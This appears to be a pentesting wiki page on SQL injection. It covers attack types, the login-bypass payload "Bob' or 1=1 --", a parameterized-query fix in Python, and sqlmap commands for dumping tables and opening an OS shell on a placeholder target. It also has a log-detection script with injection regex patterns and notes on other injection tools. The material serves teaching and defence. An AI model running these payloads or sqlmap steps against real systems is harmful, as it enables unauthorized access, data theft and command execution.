SQL Injection

SQL injection exploits unsanitized input in a web application to pass attacker-controlled SQL to the database behind it.

Attack types

SQL injections can be used for various types of attacks:

  • Authentication Bypass: An intruder gains access to an application without a valid username and password, effectively obtaining administrative privileges.

  • Authorization Bypass: A hacker manipulates authorization data in a database by exploiting vulnerabilities, such as SQL injection.

  • Information Disclosure: An attacker acquires sensitive data from a database, potentially compromising the confidentiality of the information.

  • Compromised Data Integrity: Intruders vandalize web pages, insert malicious content, or alter a database's contents, compromising data integrity.

  • Compromised Data Availability: Aggressors delete database information, log records, or audit data stored in a database, leading to data unavailability.

  • Remote Code Execution: Intruders compromise the host operating system, potentially gaining control over the system's functionality.

SQL Injection example

Attackers can craft a query by inputting specific values in application fields, such as usernames and passwords. For example:

  • Username: Bob' or 1=1 --

  • Password: Whatever

When the application builds the query by concatenating these values directly into the SQL string, the result is:

SELECT Count(*) FROM Users WHERE UserName='Bob' or 1=1 --' AND Password='Whatever';

Analyzing this query reveals that the condition in the WHERE clause will always evaluate to true, potentially leading to unauthorized access.
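The effect of that input on a login check, shown as an added example that is not part of the original page: a Python sqlite3 script with a constructed two-user table. The string-concatenated version produces exactly the query above and admits the attacker; the parameterized version sends the same text as a plain value, so the quote and the "--" never become SQL syntax.

```python
import sqlite3


def make_db():
    # Constructed sample data. Plaintext passwords only to keep the demo short;
    # a real system stores salted hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def build_vulnerable_query(username, password):
    # Concatenation: user text becomes part of the statement itself.
    return ("SELECT Count(*) FROM Users WHERE UserName='" + username +
            "' AND Password='" + password + "';")


def login_vulnerable(conn, username, password):
    # With the page's payload, "' or 1=1 --" turns the WHERE clause into a
    # tautology and comments out the password check, so Count(*) is the
    # whole table.
    count = conn.execute(build_vulnerable_query(username, password)).fetchone()[0]
    return count > 0


def login_parameterized(conn, username, password):
    # Placeholders: the driver binds values separately from the statement
    # text, so the payload is compared literally against UserName.
    query = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    count = conn.execute(query, (username, password)).fetchone()[0]
    return count > 0


if __name__ == "__main__":
    db = make_db()
    payload_user, payload_pass = "Bob' or 1=1 --", "Whatever"
    print(build_vulnerable_query(payload_user, payload_pass))
    print("vulnerable login:", login_vulnerable(db, payload_user, payload_pass))
    print("parameterized login:", login_parameterized(db, payload_user, payload_pass))
```

The same fix applies to any driver: keep SQL text constant and pass data through the driver's parameter mechanism (or an ORM that does so); escaping quotes by hand is error-prone and is not a substitute.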

Cheat Sheets

Tools

sqlmap

"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections."

Target URL and Cookies: First, specify the target URL where the injection will occur. You can also provide the necessary cookies for authentication.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" --dbs
  • -u specifies the target URL.

  • --cookie is used to set the HTTP cookie header.

  • --dbs instructs sqlmap to enumerate the available databases in the DBMS.

Select a Database: After identifying the databases, you can select a specific one for further exploration. In this example, we'll use a database named "exampledb."

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" -D exampledb --tables
  • -D specifies the database to enumerate.

  • --tables instructs sqlmap to list the tables in the chosen database.

Retrieve Table Content: Now, let's say we want to retrieve the content of a table called "user_data." You can use sqlmap to dump the table content.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" -D exampledb -T user_data --dump
  • -T specifies the table to extract data from.

  • --dump is used to retrieve and display the table content.

Interactive OS Shell: sqlmap can also provide an interactive OS shell for advanced operations.

sqlmap -u "http://www.example.com/vulnerable-page" --cookie="[cookie value]" --os-shell
  • --os-shell initiates an interactive OS shell.

  • Optimize Delay Responses: If prompted with a message asking if you want sqlmap to optimize delay responses, you can respond with "Y" to improve the injection efficiency.

  • View Available Commands: To explore the available commands within the interactive OS shell, simply type "help."
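From the defender's side, a scan like the one walked through above leaves a recognisable trail in the web server's access log: injection syntax in request parameters and, unless the scanner was told otherwise, a User-Agent naming the tool. The following is an added example, not part of the original page or of sqlmap, that parses a few constructed Common Log Format lines (the IPs, timestamps and the "sqlmap/1.7 (https://sqlmap.org)" User-Agent string are made up for the demo) and flags the suspicious requests with the reason each matched.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /vulnerable-page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:37 +0000] "GET /vulnerable-page?id=1%27%20or%201%3D1%20-- HTTP/1.1" 200 9182 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:38 +0000] "GET /vulnerable-page?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators of classic injection syntax, checked against the URL-decoded
# request path so that %27 and %20 encodings do not hide them.
PAYLOAD_PATTERNS = {
    "tautology": re.compile(r"'\s*(or|and)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(?", re.I),
    "comment": re.compile(r"--|/\*"),
}


def parse_line(line):
    """Return a dict of log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec


def classify(rec):
    """List the reasons a parsed request looks like SQL injection probing."""
    reasons = [name for name, pat in PAYLOAD_PATTERNS.items()
               if pat.search(rec["decoded_path"])]
    # Default sqlmap User-Agent contains the tool name; trivially changed by
    # an attacker, so treat it as corroboration, not the only signal.
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap-user-agent")
    return reasons


def analyze(log_text):
    """Return one finding per suspicious line, in log order."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"line": n, "ip": rec["ip"],
                             "path": rec["decoded_path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {f['path']!r}: {', '.join(f['reasons'])}")
```

Pattern matching on request paths catches the noisy, automated phase of a scan; it does not see POST bodies or headers, and a deliberately quiet attacker can avoid every pattern here, so treat hits as a trigger for review rather than as proof, and fix the injection itself with parameterized queries.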

Mole

Mole is a graphical, cross-platform SQL injection testing tool. It provides a user-friendly interface for analyzing and manipulating SQL injection attacks, making it easier for testers to perform various SQL injection techniques and assess the security of a web application.

Blisqy

Blisqy is a lightweight and open-source SQL Injection tool that is designed to automate the process of discovering and exploiting SQL injection vulnerabilities in web applications. It's a command-line tool that provides a simple and efficient way to identify and exploit SQL injection flaws.

For mobile devices

sqlmapchik

"sqlmapchik is a cross-platform sqlmap GUI for popular sqlmap tool. It is primarily aimed to be used on mobile devices (currently Android is supported)."
